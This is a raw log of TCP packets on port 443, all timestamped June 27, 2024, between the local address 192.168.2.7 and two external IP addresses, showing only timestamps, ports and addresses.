Jun 27, 2024 05:58:34.974328041 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.974348068 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.974673033 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.974715948 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.974737883 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.974752903 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.974772930 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.974795103 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.976408005 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.976450920 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.976471901 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.976514101 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.976531982 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.976556063 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.984503984 CEST	443	49723	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:34.991041899 CEST	49723	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:34.991050005 CEST	443	49723	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:34.996383905 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.996426105 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.996448040 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.996468067 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:34.996500015 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:34.996517897 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.019833088 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.019881964 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.019921064 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.019937038 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.019959927 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.019975901 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.020638943 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.020720959 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.020757914 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.020818949 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.022315979 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.022358894 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.022394896 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.022413015 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.022433043 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.022449970 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.023315907 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.023355961 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.023394108 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.023406029 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.023430109 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.023523092 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.025223017 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.025264025 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.025302887 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.025314093 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.025337934 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.025391102 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.026153088 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.026220083 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.026262999 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.026329994 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.035305023 CEST	49723	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:35.051004887 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.051047087 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.051079988 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.051095009 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.051112890 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.051130056 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.084995985 CEST	443	49723	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:35.085045099 CEST	443	49723	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:35.085091114 CEST	443	49723	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:35.085125923 CEST	49723	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:35.085141897 CEST	443	49723	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:35.085191011 CEST	49723	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:35.086316109 CEST	49723	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:35.086343050 CEST	443	49723	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:35.089101076 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.089132071 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.089170933 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.089185953 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.089210033 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.089226007 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.112653971 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.112683058 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.112732887 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.112746954 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.112761974 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.112782955 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.113436937 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.113466024 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.113491058 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.113497019 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.113519907 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.113535881 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.114053965 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.114073992 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.114094973 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.114099026 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.114125013 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.114141941 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.115869045 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.115886927 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.115925074 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.115931988 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.115968943 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.116890907 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.116913080 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.116955042 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.116964102 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.116981983 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.116997004 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.117822886 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.117840052 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.117872000 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.117883921 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.117897034 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.118021965 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.143652916 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.143740892 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.143754005 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.143829107 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.143865108 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.143932104 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.181842089 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.181878090 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.181927919 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.181967974 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.181987047 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.182306051 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.204932928 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.204986095 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.205014944 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.205029964 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.205054998 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.205075979 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.205924034 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.205980062 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.205996037 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.206005096 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.206032038 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.206049919 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.206746101 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.206799030 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.206824064 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.206830025 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.206856012 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.206873894 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.208579063 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.208633900 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.208657026 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.208663940 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.208693027 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.208707094 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.209589958 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.209635019 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.209650040 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.209657907 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.209688902 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.209705114 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.210742950 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.210793972 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.210836887 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.210843086 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.210872889 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.210889101 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.236121893 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.236187935 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.236222982 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.236228943 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.236255884 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.236274004 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.274502993 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.274581909 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.274617910 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.274648905 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.274668932 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.274931908 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.308360100 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.308394909 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.308468103 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.308562994 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.308623075 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.309297085 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.309314966 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.309322119 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.309341908 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.309348106 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.309389114 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.310193062 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.310214043 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.310266972 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.310296059 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.310327053 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.310348034 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.311125040 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.311151028 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.311213017 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.311239004 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.311434984 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.312967062 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.312998056 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.313045979 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.313059092 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.313076973 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.313092947 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.313929081 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.313949108 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.313994884 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.314007044 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.314070940 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.337726116 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.337757111 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.337821007 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.337893963 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.337935925 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.338164091 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.377739906 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.377773046 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.377825975 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.377835989 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.377875090 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.402153969 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.402230024 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.402265072 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.402277946 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.402317047 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.402340889 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.402714014 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.402761936 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.402795076 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.402801037 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.402827024 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.402843952 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.403920889 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.403973103 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.404006958 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.404012918 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.404036999 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.404052019 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.404891014 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.404933929 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.404958010 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.404963970 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.404994965 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.405009985 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.405834913 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.405880928 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.405908108 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.405914068 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.405940056 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.405956984 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.406795025 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.406841040 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.406873941 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.406879902 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.406898975 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.406936884 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.430578947 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.430639982 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.430706024 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.430715084 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.430761099 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.470848083 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.470911980 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.470952988 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.470973969 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.471004009 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.471024036 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.494570017 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.494627953 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.494724035 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.494740963 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.494824886 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.495218992 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.495260954 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.495287895 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.495321035 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.495348930 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.495393991 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.497749090 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.497791052 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.497876883 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.497891903 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.497915983 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.497965097 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.497972012 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.497999907 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.498034954 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.498056889 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.498528957 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.498585939 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.498635054 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.498651981 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.498678923 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.498699903 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.499574900 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.499614954 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.499660015 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.499672890 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.499701023 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.499717951 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.523437023 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.523525000 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.523529053 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.523561954 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.523591042 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.523618937 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.563184023 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.563225031 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.563297033 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.563318014 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.563344955 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.563366890 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.587132931 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.587162971 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.587229013 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.587244034 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.587272882 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.587292910 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.587856054 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.587888956 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.587929964 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.587941885 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.587966919 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.587986946 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.588861942 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.588886023 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.588937998 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.588949919 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.588974953 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.588994980 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.589839935 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.589860916 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.589910030 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.589924097 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.589946985 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.590039015 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:35.590761900 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:35.590784073 CEST	443	49709	31.31.196.208	192.168.2.7
